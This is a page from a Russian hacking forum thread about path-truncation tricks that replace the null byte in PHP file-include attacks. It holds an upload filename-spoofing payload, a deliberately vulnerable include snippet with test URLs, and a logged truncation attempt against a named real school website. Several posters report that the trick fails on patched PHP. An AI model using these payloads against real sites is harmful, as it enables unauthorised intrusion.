ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу [новый способ] замена нулл-байту в инклудах
   
Ответ
Страница 8 из 8 « Первая < 4 5 6 7 8
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.03.2010, 01:18
Аватар для Root-access
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440

Репутация: 648
Отправить сообщение для Root-access с помощью ICQ
По умолчанию
Цитата:
Сообщение от Nek1t  
Код:
--UPLOAD_DATA_8CA3
Content-Disposition: form-data; name=file; filename=pwnd.php[//////].jpg
Content-Type: image/jpeg
Content-Transfer-Encoding: binary
Нет, этот трюк не выходит. То есть если писать набор слешей, они воспринимаются, как переход к новой директории, и расширение не обрезается. Если писать точки, тоже не выходит...
Последний раз редактировалось Root-access; 16.03.2010 в 19:26..
 
Ответить с цитированием

  #2  
Старый 20.03.2010, 05:52
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию
win xp sp2
Server API Apache 2.0 Handler
PHP Version 5.3.1
Apache/2.2.4
allow_url_fopen On
allow_url_include Off

1.php
PHP код:
include ($_GET['f'].'.php');

if($yes)
 {
 echo '<br>использовано ".": '.strlen($_GET['f']);
 } 
lol.txt
Код:
12345
<?$yes=1?>
Инклуд с текущего каталога!
Код:
http://localhost/include/1.php?f=lol.txt[.]
http://localhost/include/1.php?f=lol.txt[%20]
http://localhost/include/1.php?f=lol.txt[%22]
http://localhost/include/1.php?f=lol.txt[.%20]
За пределы!
Код:
http://localhost/include/1.php?f=inc/lol.txt[.]
etc
(:чтоб была ясна - не работает баг!
Последний раз редактировалось Strilo4ka; 20.03.2010 в 19:00..
 
Ответить с цитированием

  #3  
Старый 24.04.2010, 23:07
Аватар для (Dm)
(Dm)
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме:
2375131

Репутация: 1695
По умолчанию
Strilo4ka не совсем понял что ты имела ввиду. есть такая вещь как php suhosin patch.
с последними версиями этого патча. ни нул байт не работает, ни обрезание строк.
__________________
Cервер cs 1.6
cs.antichat.net:27015
 
Ответить с цитированием

  #4  
Старый 25.04.2010, 04:00
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Strilo4ka, в php 5.3+ бага закрыта
 
Ответить с цитированием

  #5  
Старый 14.05.2010, 11:37
Аватар для kfor
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095

Репутация: 34
Отправить сообщение для kfor с помощью ICQ
По умолчанию
PHP Version 4.4.9
Linux
Apache 2.*
Никак не могу отбросить .php но блин как чувствую должно работать, кто нибудь эксперементировал на подобной версии?
 
Ответить с цитированием

  #6  
Старый 04.06.2010, 15:31
Аватар для 547
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию
зачастую бывает просто пишет "превышен лимит значений" и все и ничего интерестного просто непроисходит....

Код:
http://www.sman1-tasik.sch.id/index.php?exec=/home/sloki/user/h21071/sites/sman1-tasik.sch.id/www/theme/Demo/index.php////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
ALERT - configured GET variable value length limit exceeded - dropped variable 'exec' (attacker '00.000.000.000', file '/s/www.sman1-tasik.sch.id/www/index.php') X-Powered-By: PHP/5.2.6-1+lenny8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: maxrow=20; expires=Fri, 03-Jun-2011 17:00:00 GMT Set-Cookie: uselang=Indonesia; expires=Fri, 03-Jun-2011 17:00:00 GMT Set-Cookie: theme=Demo; expires=Fri, 03-Jun-2011 17:00:00 GMT Content-type: text/html
 
Ответить с цитированием

  #7  
Старый 29.12.2008, 22:10
Аватар для ShAnKaR
ShAnKaR
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


Отправить сообщение для ShAnKaR с помощью ICQ
По умолчанию
интересно конечно, у кого нибудь сработало?
 
Ответить с цитированием

  #8  
Старый 30.12.2008, 18:09
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию
Цитата:
Сообщение от ChaaK  
Класс zend_file_handle? Не найти что-то
Сейчас сорцы качаю.
Цитата:
Сообщение от SQLHACK  
вот проверил несколько функций, как то странно.

require_once - работает
require - работает
include - работает
include_once - работает
file_get_contents - не работает
fopen - не работает
file - не работает
readfile - не работает

почему только функции инклюда подвержены ?
а Virtual и другие не пашут.
Потому что ТОЛЬКО функции инклуда, вызывают функцию getcwd, для вычисления абсолютного пути по относительному (хех, я был прав, в том что проблема с вычислением пути по текущему, посмотрим прав ли в остальном)
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием
Ответ
Страница 8 из 8 « Первая < 4 5 6 7 8



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ